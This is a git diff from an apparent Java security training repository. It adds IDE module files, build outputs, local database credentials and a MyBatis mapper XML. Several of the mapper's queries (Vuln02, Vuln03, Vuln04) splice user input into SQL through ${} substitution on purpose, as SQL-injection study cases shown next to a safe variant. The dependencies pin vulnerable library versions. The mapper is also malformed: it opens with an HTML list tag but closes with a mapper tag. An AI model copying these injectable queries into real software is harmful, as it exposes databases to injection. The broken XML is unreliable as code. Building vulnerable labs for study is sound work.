+++ b/JavaSecurity/CodeReview/JavaSec-Code/CC/target/classes/application.properties
@@ -0,0 +1 @@
+server.port=8081
\ No newline at end of file
diff --git a/JavaSecurity/CodeReview/JavaSec-Code/CC/target/classes/com/drunkbaby/CCRunApplication.class b/JavaSecurity/CodeReview/JavaSec-Code/CC/target/classes/com/drunkbaby/CCRunApplication.class
new file mode 100644
index 00000000..ecdfcba6
Binary files /dev/null and b/JavaSecurity/CodeReview/JavaSec-Code/CC/target/classes/com/drunkbaby/CCRunApplication.class differ
diff --git a/JavaSecurity/CodeReview/JavaSec-Code/CC/target/classes/com/drunkbaby/controller/CC3EXP.class b/JavaSecurity/CodeReview/JavaSec-Code/CC/target/classes/com/drunkbaby/controller/CC3EXP.class
new file mode 100644
index 00000000..fe8c6972
Binary files /dev/null and b/JavaSecurity/CodeReview/JavaSec-Code/CC/target/classes/com/drunkbaby/controller/CC3EXP.class differ
diff --git a/JavaSecurity/CodeReview/JavaSec-Code/CC/target/classes/com/drunkbaby/controller/CChains.class b/JavaSecurity/CodeReview/JavaSec-Code/CC/target/classes/com/drunkbaby/controller/CChains.class
new file mode 100644
index 00000000..7b555378
Binary files /dev/null and b/JavaSecurity/CodeReview/JavaSec-Code/CC/target/classes/com/drunkbaby/controller/CChains.class differ
diff --git a/JavaSecurity/CodeReview/JavaSec-Code/JavaSec-Code.iml b/JavaSecurity/CodeReview/JavaSec-Code/JavaSec-Code.iml
new file mode 100644
index 00000000..2bf2b4a3
--- /dev/null
+++ b/JavaSecurity/CodeReview/JavaSec-Code/JavaSec-Code.iml
@@ -0,0 +1,93 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<module org.jetbrains.idea.maven.project.MavenProjectsManager.isMavenModule="true" type="JAVA_MODULE" version="4">
+ <component name="FacetManager">
+ <facet type="web" name="Web">
+ <configuration>
+ <webroots />
+ <sourceroots>
+ <root url="file://$MODULE_DIR$/src/main/java" />
+ <root url="file://$MODULE_DIR$/src/main/resources" />
+ </sourceroots>
+ </configuration>
+ </facet>
+ <facet type="Spring" name="Spring">
+ <configuration />
+ </facet>
+ </component>
+ <component name="NewModuleRootManager" LANGUAGE_LEVEL="JDK_1_8">
+ <output url="file://$MODULE_DIR$/target/classes" />
+ <output-test url="file://$MODULE_DIR$/target/test-classes" />
+ <content url="file://$MODULE_DIR$">
+ <sourcefolder url="file://$MODULE_DIR$/src/main/java" isTestSource="false" />
+ <sourcefolder url="file://$MODULE_DIR$/src/main/resources" type="java-resource" />
+ <sourcefolder url="file://$MODULE_DIR$/src/test/java" isTestSource="true" />
+ <excludefolder url="file://$MODULE_DIR$/target" />
+ </content>
+ <orderentry type="inheritedJdk" />
+ <orderentry type="sourceFolder" forTests="false" />
+ <orderentry type="library" name="Maven: org.springframework.boot:spring-boot-starter-web:2.7.3" level="project" />
+ <orderentry type="library" name="Maven: org.springframework.boot:spring-boot-starter:2.7.3" level="project" />
+ <orderentry type="library" name="Maven: org.springframework.boot:spring-boot:2.7.3" level="project" />
+ <orderentry type="library" name="Maven: org.springframework.boot:spring-boot-autoconfigure:2.7.3" level="project" />
+ <orderentry type="library" name="Maven: org.springframework.boot:spring-boot-starter-logging:2.7.3" level="project" />
+ <orderentry type="library" name="Maven: ch.qos.logback:logback-classic:1.2.11" level="project" />
+ <orderentry type="library" name="Maven: ch.qos.logback:logback-core:1.2.11" level="project" />
+ <orderentry type="library" name="Maven: org.apache.logging.log4j:log4j-to-slf4j:2.17.2" level="project" />
+ <orderentry type="library" name="Maven: org.slf4j:jul-to-slf4j:1.7.36" level="project" />
+ <orderentry type="library" name="Maven: jakarta.annotation:jakarta.annotation-api:1.3.5" level="project" />
+ <orderentry type="library" name="Maven: org.yaml:snakeyaml:1.30" level="project" />
+ <orderentry type="library" name="Maven: org.springframework.boot:spring-boot-starter-json:2.7.3" level="project" />
+ <orderentry type="library" name="Maven: com.fasterxml.jackson.core:jackson-databind:2.13.3" level="project" />
+ <orderentry type="library" name="Maven: com.fasterxml.jackson.core:jackson-annotations:2.13.3" level="project" />
+ <orderentry type="library" name="Maven: com.fasterxml.jackson.core:jackson-core:2.13.3" level="project" />
+ <orderentry type="library" name="Maven: com.fasterxml.jackson.datatype:jackson-datatype-jdk8:2.13.3" level="project" />
+ <orderentry type="library" name="Maven: com.fasterxml.jackson.datatype:jackson-datatype-jsr310:2.13.3" level="project" />
+ <orderentry type="library" name="Maven: com.fasterxml.jackson.module:jackson-module-parameter-names:2.13.3" level="project" />
+ <orderentry type="library" name="Maven: org.springframework.boot:spring-boot-starter-tomcat:2.7.3" level="project" />
+ <orderentry type="library" name="Maven: org.apache.tomcat.embed:tomcat-embed-core:9.0.65" level="project" />
+ <orderentry type="library" name="Maven: org.apache.tomcat.embed:tomcat-embed-el:9.0.65" level="project" />
+ <orderentry type="library" name="Maven: org.apache.tomcat.embed:tomcat-embed-websocket:9.0.65" level="project" />
+ <orderentry type="library" name="Maven: org.springframework:spring-web:5.3.22" level="project" />
+ <orderentry type="library" name="Maven: org.springframework:spring-beans:5.3.22" level="project" />
+ <orderentry type="library" name="Maven: org.springframework:spring-webmvc:5.3.22" level="project" />
+ <orderentry type="library" name="Maven: org.springframework:spring-aop:5.3.22" level="project" />
+ <orderentry type="library" name="Maven: org.springframework:spring-context:5.3.22" level="project" />
+ <orderentry type="library" name="Maven: org.springframework:spring-expression:5.3.22" level="project" />
+ <orderentry type="library" name="Maven: org.projectlombok:lombok:1.18.24" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.springframework.boot:spring-boot-starter-test:2.7.3" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.springframework.boot:spring-boot-test:2.7.3" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.springframework.boot:spring-boot-test-autoconfigure:2.7.3" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: com.jayway.jsonpath:json-path:2.7.0" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: net.minidev:json-smart:2.4.8" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: net.minidev:accessors-smart:2.4.8" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.ow2.asm:asm:9.1" level="project" />
+ <orderentry type="library" name="Maven: org.slf4j:slf4j-api:1.7.36" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: jakarta.xml.bind:jakarta.xml.bind-api:2.3.3" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: jakarta.activation:jakarta.activation-api:1.2.2" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.assertj:assertj-core:3.22.0" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.hamcrest:hamcrest:2.2" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.junit.jupiter:junit-jupiter:5.8.2" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.junit.jupiter:junit-jupiter-api:5.8.2" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.opentest4j:opentest4j:1.2.0" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.junit.platform:junit-platform-commons:1.8.2" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.apiguardian:apiguardian-api:1.1.2" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.junit.jupiter:junit-jupiter-params:5.8.2" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.junit.jupiter:junit-jupiter-engine:5.8.2" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.junit.platform:junit-platform-engine:1.8.2" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.mockito:mockito-core:4.5.1" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: net.bytebuddy:byte-buddy:1.12.13" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: net.bytebuddy:byte-buddy-agent:1.12.13" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.objenesis:objenesis:3.2" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.mockito:mockito-junit-jupiter:4.5.1" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.skyscreamer:jsonassert:1.5.1" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: com.vaadin.external.google:android-json:0.0.20131108.vaadin1" level="project" />
+ <orderentry type="library" name="Maven: org.springframework:spring-core:5.3.22" level="project" />
+ <orderentry type="library" name="Maven: org.springframework:spring-jcl:5.3.22" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.springframework:spring-test:5.3.22" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.xmlunit:xmlunit-core:2.9.0" level="project" />
+ <orderentry type="library" name="Maven: mysql:mysql-connector-java:8.0.12" level="project" />
+ <orderentry type="library" name="Maven: org.apache.logging.log4j:log4j-core:2.9.1" level="project" />
+ <orderentry type="library" name="Maven: org.apache.logging.log4j:log4j-api:2.9.1" level="project" />
+ <orderentry type="library" name="Maven: commons-collections:commons-collections:3.2.1" level="project" />
+ </component>
+</module>
\ No newline at end of file
diff --git a/JavaSecurity/CodeReview/JavaSec-Code/MybatiSqli/MybatiSqli.iml b/JavaSecurity/CodeReview/JavaSec-Code/MybatiSqli/MybatiSqli.iml
new file mode 100644
index 00000000..4b6b7b07
--- /dev/null
+++ b/JavaSecurity/CodeReview/JavaSec-Code/MybatiSqli/MybatiSqli.iml
@@ -0,0 +1,101 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<module org.jetbrains.idea.maven.project.MavenProjectsManager.isMavenModule="true" type="JAVA_MODULE" version="4">
+ <component name="FacetManager">
+ <facet type="web" name="Web">
+ <configuration>
+ <webroots />
+ <sourceroots>
+ <root url="file://$MODULE_DIR$/src/main/java" />
+ <root url="file://$MODULE_DIR$/src/main/resources" />
+ </sourceroots>
+ </configuration>
+ </facet>
+ <facet type="Spring" name="Spring">
+ <configuration />
+ </facet>
+ </component>
+ <component name="NewModuleRootManager" LANGUAGE_LEVEL="JDK_1_8">
+ <output url="file://$MODULE_DIR$/target/classes" />
+ <output-test url="file://$MODULE_DIR$/target/test-classes" />
+ <content url="file://$MODULE_DIR$">
+ <sourcefolder url="file://$MODULE_DIR$/src/main/java" isTestSource="false" />
+ <sourcefolder url="file://$MODULE_DIR$/src/main/resources" type="java-resource" />
+ <sourcefolder url="file://$MODULE_DIR$/src/test/java" isTestSource="true" />
+ <excludefolder url="file://$MODULE_DIR$/target" />
+ </content>
+ <orderentry type="jdk" jdkName="1.8" jdkType="JavaSDK" />
+ <orderentry type="sourceFolder" forTests="false" />
+ <orderentry type="library" name="Maven: org.mybatis.spring.boot:mybatis-spring-boot-starter:1.3.2" level="project" />
+ <orderentry type="library" name="Maven: org.springframework.boot:spring-boot-starter:2.7.3" level="project" />
+ <orderentry type="library" name="Maven: org.springframework.boot:spring-boot:2.7.3" level="project" />
+ <orderentry type="library" name="Maven: org.springframework.boot:spring-boot-autoconfigure:2.7.3" level="project" />
+ <orderentry type="library" name="Maven: org.springframework.boot:spring-boot-starter-logging:2.7.3" level="project" />
+ <orderentry type="library" name="Maven: ch.qos.logback:logback-classic:1.2.11" level="project" />
+ <orderentry type="library" name="Maven: ch.qos.logback:logback-core:1.2.11" level="project" />
+ <orderentry type="library" name="Maven: org.apache.logging.log4j:log4j-to-slf4j:2.17.2" level="project" />
+ <orderentry type="library" name="Maven: org.slf4j:jul-to-slf4j:1.7.36" level="project" />
+ <orderentry type="library" name="Maven: jakarta.annotation:jakarta.annotation-api:1.3.5" level="project" />
+ <orderentry type="library" name="Maven: org.yaml:snakeyaml:1.30" level="project" />
+ <orderentry type="library" name="Maven: org.springframework.boot:spring-boot-starter-jdbc:2.7.3" level="project" />
+ <orderentry type="library" name="Maven: com.zaxxer:HikariCP:4.0.3" level="project" />
+ <orderentry type="library" name="Maven: org.springframework:spring-jdbc:5.3.22" level="project" />
+ <orderentry type="library" name="Maven: org.springframework:spring-tx:5.3.22" level="project" />
+ <orderentry type="library" name="Maven: org.mybatis.spring.boot:mybatis-spring-boot-autoconfigure:1.3.2" level="project" />
+ <orderentry type="library" name="Maven: org.mybatis:mybatis:3.4.6" level="project" />
+ <orderentry type="library" name="Maven: org.mybatis:mybatis-spring:1.3.2" level="project" />
+ <orderentry type="library" name="Maven: org.springframework.boot:spring-boot-starter-web:2.7.3" level="project" />
+ <orderentry type="library" name="Maven: org.springframework.boot:spring-boot-starter-json:2.7.3" level="project" />
+ <orderentry type="library" name="Maven: com.fasterxml.jackson.core:jackson-databind:2.13.3" level="project" />
+ <orderentry type="library" name="Maven: com.fasterxml.jackson.core:jackson-annotations:2.13.3" level="project" />
+ <orderentry type="library" name="Maven: com.fasterxml.jackson.core:jackson-core:2.13.3" level="project" />
+ <orderentry type="library" name="Maven: com.fasterxml.jackson.datatype:jackson-datatype-jdk8:2.13.3" level="project" />
+ <orderentry type="library" name="Maven: com.fasterxml.jackson.datatype:jackson-datatype-jsr310:2.13.3" level="project" />
+ <orderentry type="library" name="Maven: com.fasterxml.jackson.module:jackson-module-parameter-names:2.13.3" level="project" />
+ <orderentry type="library" name="Maven: org.springframework.boot:spring-boot-starter-tomcat:2.7.3" level="project" />
+ <orderentry type="library" name="Maven: org.apache.tomcat.embed:tomcat-embed-core:9.0.65" level="project" />
+ <orderentry type="library" name="Maven: org.apache.tomcat.embed:tomcat-embed-el:9.0.65" level="project" />
+ <orderentry type="library" name="Maven: org.apache.tomcat.embed:tomcat-embed-websocket:9.0.65" level="project" />
+ <orderentry type="library" name="Maven: org.springframework:spring-web:5.3.22" level="project" />
+ <orderentry type="library" name="Maven: org.springframework:spring-beans:5.3.22" level="project" />
+ <orderentry type="library" name="Maven: org.springframework:spring-webmvc:5.3.22" level="project" />
+ <orderentry type="library" name="Maven: org.springframework:spring-aop:5.3.22" level="project" />
+ <orderentry type="library" name="Maven: org.springframework:spring-context:5.3.22" level="project" />
+ <orderentry type="library" name="Maven: org.springframework:spring-expression:5.3.22" level="project" />
+ <orderentry type="library" name="Maven: org.projectlombok:lombok:1.18.24" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.springframework.boot:spring-boot-starter-test:2.7.3" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.springframework.boot:spring-boot-test:2.7.3" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.springframework.boot:spring-boot-test-autoconfigure:2.7.3" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: com.jayway.jsonpath:json-path:2.7.0" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: net.minidev:json-smart:2.4.8" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: net.minidev:accessors-smart:2.4.8" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.ow2.asm:asm:9.1" level="project" />
+ <orderentry type="library" name="Maven: org.slf4j:slf4j-api:1.7.36" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: jakarta.xml.bind:jakarta.xml.bind-api:2.3.3" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: jakarta.activation:jakarta.activation-api:1.2.2" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.assertj:assertj-core:3.22.0" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.hamcrest:hamcrest:2.2" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.junit.jupiter:junit-jupiter:5.8.2" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.junit.jupiter:junit-jupiter-api:5.8.2" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.opentest4j:opentest4j:1.2.0" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.junit.platform:junit-platform-commons:1.8.2" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.apiguardian:apiguardian-api:1.1.2" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.junit.jupiter:junit-jupiter-params:5.8.2" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.junit.jupiter:junit-jupiter-engine:5.8.2" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.junit.platform:junit-platform-engine:1.8.2" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.mockito:mockito-core:4.5.1" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: net.bytebuddy:byte-buddy:1.12.13" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: net.bytebuddy:byte-buddy-agent:1.12.13" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.objenesis:objenesis:3.2" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.mockito:mockito-junit-jupiter:4.5.1" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.skyscreamer:jsonassert:1.5.1" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: com.vaadin.external.google:android-json:0.0.20131108.vaadin1" level="project" />
+ <orderentry type="library" name="Maven: org.springframework:spring-core:5.3.22" level="project" />
+ <orderentry type="library" name="Maven: org.springframework:spring-jcl:5.3.22" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.springframework:spring-test:5.3.22" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.xmlunit:xmlunit-core:2.9.0" level="project" />
+ <orderentry type="library" name="Maven: mysql:mysql-connector-java:8.0.12" level="project" />
+ <orderentry type="library" name="Maven: org.apache.logging.log4j:log4j-core:2.9.1" level="project" />
+ <orderentry type="library" name="Maven: org.apache.logging.log4j:log4j-api:2.9.1" level="project" />
+ <orderentry type="library" name="Maven: commons-collections:commons-collections:3.2.1" level="project" />
+ </component>
+</module>
\ No newline at end of file
diff --git a/JavaSecurity/CodeReview/JavaSec-Code/MybatiSqli/target/MybatiSqli-0.0.1-SNAPSHOT.jar b/JavaSecurity/CodeReview/JavaSec-Code/MybatiSqli/target/MybatiSqli-0.0.1-SNAPSHOT.jar
new file mode 100644
index 00000000..71019dc4
Binary files /dev/null and b/JavaSecurity/CodeReview/JavaSec-Code/MybatiSqli/target/MybatiSqli-0.0.1-SNAPSHOT.jar differ
diff --git a/JavaSecurity/CodeReview/JavaSec-Code/MybatiSqli/target/MybatiSqli-0.0.1-SNAPSHOT.jar.original b/JavaSecurity/CodeReview/JavaSec-Code/MybatiSqli/target/MybatiSqli-0.0.1-SNAPSHOT.jar.original
new file mode 100644
index 00000000..dcf47199
Binary files /dev/null and b/JavaSecurity/CodeReview/JavaSec-Code/MybatiSqli/target/MybatiSqli-0.0.1-SNAPSHOT.jar.original differ
diff --git a/JavaSecurity/CodeReview/JavaSec-Code/MybatiSqli/target/classes/application.properties b/JavaSecurity/CodeReview/JavaSec-Code/MybatiSqli/target/classes/application.properties
new file mode 100644
index 00000000..8e640725
--- /dev/null
+++ b/JavaSecurity/CodeReview/JavaSec-Code/MybatiSqli/target/classes/application.properties
@@ -0,0 +1,6 @@
+server.port=8081
+spring.datasource.url=jdbc:mysql://localhost:3306/java_sec_code?AllowPublicKeyRetrieval=true&useSSL=false&serverTimezone=UTC
+spring.datasource.username=java
+spring.datasource.password=123123
+spring.datasource.driver-class-name=com.mysql.cj.jdbc.Driver
+mybatis.mapper-locations=classpath:mapper/*.xml
\ No newline at end of file
diff --git a/JavaSecurity/CodeReview/JavaSec-Code/MybatiSqli/target/classes/com/drunkbaby/MybatiSqliApplication.class b/JavaSecurity/CodeReview/JavaSec-Code/MybatiSqli/target/classes/com/drunkbaby/MybatiSqliApplication.class
new file mode 100644
index 00000000..1e5a6bc6
Binary files /dev/null and b/JavaSecurity/CodeReview/JavaSec-Code/MybatiSqli/target/classes/com/drunkbaby/MybatiSqliApplication.class differ
diff --git a/JavaSecurity/CodeReview/JavaSec-Code/MybatiSqli/target/classes/com/drunkbaby/controller/SQLI.class b/JavaSecurity/CodeReview/JavaSec-Code/MybatiSqli/target/classes/com/drunkbaby/controller/SQLI.class
new file mode 100644
index 00000000..eeb6253b
Binary files /dev/null and b/JavaSecurity/CodeReview/JavaSec-Code/MybatiSqli/target/classes/com/drunkbaby/controller/SQLI.class differ
diff --git a/JavaSecurity/CodeReview/JavaSec-Code/MybatiSqli/target/classes/com/drunkbaby/mapper/UserMapper.class b/JavaSecurity/CodeReview/JavaSec-Code/MybatiSqli/target/classes/com/drunkbaby/mapper/UserMapper.class
new file mode 100644
index 00000000..6d165225
Binary files /dev/null and b/JavaSecurity/CodeReview/JavaSec-Code/MybatiSqli/target/classes/com/drunkbaby/mapper/UserMapper.class differ
diff --git a/JavaSecurity/CodeReview/JavaSec-Code/MybatiSqli/target/classes/com/drunkbaby/pojo/User.class b/JavaSecurity/CodeReview/JavaSec-Code/MybatiSqli/target/classes/com/drunkbaby/pojo/User.class
new file mode 100644
index 00000000..55c7f1f6
Binary files /dev/null and b/JavaSecurity/CodeReview/JavaSec-Code/MybatiSqli/target/classes/com/drunkbaby/pojo/User.class differ
diff --git a/JavaSecurity/CodeReview/JavaSec-Code/MybatiSqli/target/classes/com/drunkbaby/utils/SqliFilterUtil.class b/JavaSecurity/CodeReview/JavaSec-Code/MybatiSqli/target/classes/com/drunkbaby/utils/SqliFilterUtil.class
new file mode 100644
index 00000000..aaf00bf6
Binary files /dev/null and b/JavaSecurity/CodeReview/JavaSec-Code/MybatiSqli/target/classes/com/drunkbaby/utils/SqliFilterUtil.class differ
diff --git a/JavaSecurity/CodeReview/JavaSec-Code/MybatiSqli/target/classes/mapper/UserMapper.xml b/JavaSecurity/CodeReview/JavaSec-Code/MybatiSqli/target/classes/mapper/UserMapper.xml
new file mode 100644
index 00000000..4cc0075e
--- /dev/null
+++ b/JavaSecurity/CodeReview/JavaSec-Code/MybatiSqli/target/classes/mapper/UserMapper.xml
@@ -0,0 +1,49 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<!doctype mapper PUBLIC "-//mybatis.org//DTD Mapper 3.0//EN" "http://mybatis.org/dtd/mybatis-3-mapper.dtd">
+
+<ul class="image_map">
+
+ <resultmap type="com.drunkbaby.pojo.User" id="User">
+ <id column="id" property="id" javaType="java.lang.Integer" jdbcType="NUMERIC"/>
+ <id column="username" property="username" javaType="java.lang.String" jdbcType="VARCHAR"/>
+ <id column="password" property="password" javaType="java.lang.String" jdbcType="VARCHAR"/>
+ </resultmap>
+
+ 
+	 
+ 
+
+ <select id="findByUserNameVuln02" parameterType="String" resultMap="User">
+ select * from users where username like '%${_parameter}%'
+ </select>
+
+ <select id="findByUserNameVuln03" parameterType="String" resultMap="User">
+ select * from users
+ <if test="order != null">
+ order by ${order} asc
+ </if>
+ </select>
+
+ <select id="findByIdVuln04" parameterType="String" resultMap="User">
+ select * from users where id in (${id})
+ </select>
+
+ <select id="findByIdSec04" parameterType="String" resultMap="User">
+ SELECT
+ *
+ from users
+ WHERE id IN
+ <foreach collection="id" item="id" open="(" close=")" separator=",">
+ #{id}
+ </foreach>
+ </select>
+
+ <select id="findById" resultMap="User">
+ select * from users where id = #{id}
+ </select>
+
+
+ <select id="OrderByUsername" resultMap="User">
+ select * from users order by id asc limit 1
+ </select>
+</mapper>
\ No newline at end of file
diff --git a/JavaSecurity/CodeReview/JavaSec-Code/MybatiSqli/target/maven-archiver/pom.properties b/JavaSecurity/CodeReview/JavaSec-Code/MybatiSqli/target/maven-archiver/pom.properties
new file mode 100644
index 00000000..d7b9779c
--- /dev/null
+++ b/JavaSecurity/CodeReview/JavaSec-Code/MybatiSqli/target/maven-archiver/pom.properties
@@ -0,0 +1,3 @@
+artifactId=MybatiSqli
+groupId=com.drunkbaby
+version=0.0.1-SNAPSHOT
diff --git a/JavaSecurity/CodeReview/JavaSec-Code/MybatiSqli/target/maven-status/maven-compiler-plugin/compile/default-compile/createdFiles.lst b/JavaSecurity/CodeReview/JavaSec-Code/MybatiSqli/target/maven-status/maven-compiler-plugin/compile/default-compile/createdFiles.lst
new file mode 100644
index 00000000..c3d6e2bf
--- /dev/null
+++ b/JavaSecurity/CodeReview/JavaSec-Code/MybatiSqli/target/maven-status/maven-compiler-plugin/compile/default-compile/createdFiles.lst
@@ -0,0 +1,5 @@
+com\drunkbaby\controller\SQLI.class
+com\drunkbaby\mapper\UserMapper.class
+com\drunkbaby\pojo\User.class
+com\drunkbaby\utils\SqliFilterUtil.class
+com\drunkbaby\MybatiSqliApplication.class
diff --git a/JavaSecurity/CodeReview/JavaSec-Code/MybatiSqli/target/maven-status/maven-compiler-plugin/compile/default-compile/inputFiles.lst b/JavaSecurity/CodeReview/JavaSec-Code/MybatiSqli/target/maven-status/maven-compiler-plugin/compile/default-compile/inputFiles.lst
new file mode 100644
index 00000000..ba69bc7b
--- /dev/null
+++ b/JavaSecurity/CodeReview/JavaSec-Code/MybatiSqli/target/maven-status/maven-compiler-plugin/compile/default-compile/inputFiles.lst
@@ -0,0 +1,5 @@
+G:\OneDrive - yapuu\Java��ȫѧκ\JavaSecurityLearning\JavaSecurity\CodeReview\JavaSec-Code\MybatiSqli\src\main\java\com\drunkbaby\utils\SqliFilterUtil.java
+G:\OneDrive - yapuu\Java��ȫѧκ\JavaSecurityLearning\JavaSecurity\CodeReview\JavaSec-Code\MybatiSqli\src\main\java\com\drunkbaby\MybatiSqliApplication.java
+G:\OneDrive - yapuu\Java��ȫѧκ\JavaSecurityLearning\JavaSecurity\CodeReview\JavaSec-Code\MybatiSqli\src\main\java\com\drunkbaby\pojo\User.java
+G:\OneDrive - yapuu\Java��ȫѧκ\JavaSecurityLearning\JavaSecurity\CodeReview\JavaSec-Code\MybatiSqli\src\main\java\com\drunkbaby\controller\SQLI.java
+G:\OneDrive - yapuu\Java��ȫѧκ\JavaSecurityLearning\JavaSecurity\CodeReview\JavaSec-Code\MybatiSqli\src\main\java\com\drunkbaby\mapper\UserMapper.java
diff --git a/JavaSecurity/CodeReview/JavaSec-Code/MybatisPluSqli/MybatisPluSqli.iml b/JavaSecurity/CodeReview/JavaSec-Code/MybatisPluSqli/MybatisPluSqli.iml
new file mode 100644
index 00000000..ac20b6c2
--- /dev/null
+++ b/JavaSecurity/CodeReview/JavaSec-Code/MybatisPluSqli/MybatisPluSqli.iml
@@ -0,0 +1,105 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<module org.jetbrains.idea.maven.project.MavenProjectsManager.isMavenModule="true" type="JAVA_MODULE" version="4">
+ <component name="FacetManager">
+ <facet type="web" name="Web">
+ <configuration>
+ <webroots />
+ <sourceroots>
+ <root url="file://$MODULE_DIR$/src/main/java" />
+ <root url="file://$MODULE_DIR$/src/main/resources" />
+ </sourceroots>
+ </configuration>
+ </facet>
+ <facet type="Spring" name="Spring">
+ <configuration />
+ </facet>
+ </component>
+ <component name="NewModuleRootManager" LANGUAGE_LEVEL="JDK_1_8">
+ <output url="file://$MODULE_DIR$/target/classes" />
+ <output-test url="file://$MODULE_DIR$/target/test-classes" />
+ <content url="file://$MODULE_DIR$">
+ <sourcefolder url="file://$MODULE_DIR$/src/main/java" isTestSource="false" />
+ <sourcefolder url="file://$MODULE_DIR$/src/main/resources" type="java-resource" />
+ <sourcefolder url="file://$MODULE_DIR$/src/test/java" isTestSource="true" />
+ <excludefolder url="file://$MODULE_DIR$/target" />
+ </content>
+ <orderentry type="jdk" jdkName="1.8" jdkType="JavaSDK" />
+ <orderentry type="sourceFolder" forTests="false" />
+ <orderentry type="library" name="Maven: com.baomidou:mybatis-plus-boot-starter:3.4.0" level="project" />
+ <orderentry type="library" name="Maven: com.baomidou:mybatis-plus:3.4.0" level="project" />
+ <orderentry type="library" name="Maven: org.springframework.boot:spring-boot-autoconfigure:2.7.3" level="project" />
+ <orderentry type="library" name="Maven: org.springframework.boot:spring-boot:2.7.3" level="project" />
+ <orderentry type="library" name="Maven: org.springframework.boot:spring-boot-starter-jdbc:2.7.3" level="project" />
+ <orderentry type="library" name="Maven: com.zaxxer:HikariCP:4.0.3" level="project" />
+ <orderentry type="library" name="Maven: org.springframework:spring-jdbc:5.3.22" level="project" />
+ <orderentry type="library" name="Maven: org.springframework:spring-tx:5.3.22" level="project" />
+ <orderentry type="library" name="Maven: com.baomidou:mybatis-plus-extension:3.4.0" level="project" />
+ <orderentry type="library" name="Maven: com.baomidou:mybatis-plus-core:3.4.0" level="project" />
+ <orderentry type="library" name="Maven: com.baomidou:mybatis-plus-annotation:3.4.0" level="project" />
+ <orderentry type="library" name="Maven: com.github.jsqlparser:jsqlparser:3.2" level="project" />
+ <orderentry type="library" name="Maven: org.mybatis:mybatis:3.5.5" level="project" />
+ <orderentry type="library" name="Maven: org.mybatis:mybatis-spring:2.0.5" level="project" />
+ <orderentry type="library" name="Maven: org.springframework.boot:spring-boot-starter-web:2.7.3" level="project" />
+ <orderentry type="library" name="Maven: org.springframework.boot:spring-boot-starter:2.7.3" level="project" />
+ <orderentry type="library" name="Maven: org.springframework.boot:spring-boot-starter-logging:2.7.3" level="project" />
+ <orderentry type="library" name="Maven: ch.qos.logback:logback-classic:1.2.11" level="project" />
+ <orderentry type="library" name="Maven: ch.qos.logback:logback-core:1.2.11" level="project" />
+ <orderentry type="library" name="Maven: org.apache.logging.log4j:log4j-to-slf4j:2.17.2" level="project" />
+ <orderentry type="library" name="Maven: org.slf4j:jul-to-slf4j:1.7.36" level="project" />
+ <orderentry type="library" name="Maven: jakarta.annotation:jakarta.annotation-api:1.3.5" level="project" />
+ <orderentry type="library" name="Maven: org.yaml:snakeyaml:1.30" level="project" />
+ <orderentry type="library" name="Maven: org.springframework.boot:spring-boot-starter-json:2.7.3" level="project" />
+ <orderentry type="library" name="Maven: com.fasterxml.jackson.core:jackson-databind:2.13.3" level="project" />
+ <orderentry type="library" name="Maven: com.fasterxml.jackson.core:jackson-annotations:2.13.3" level="project" />
+ <orderentry type="library" name="Maven: com.fasterxml.jackson.core:jackson-core:2.13.3" level="project" />
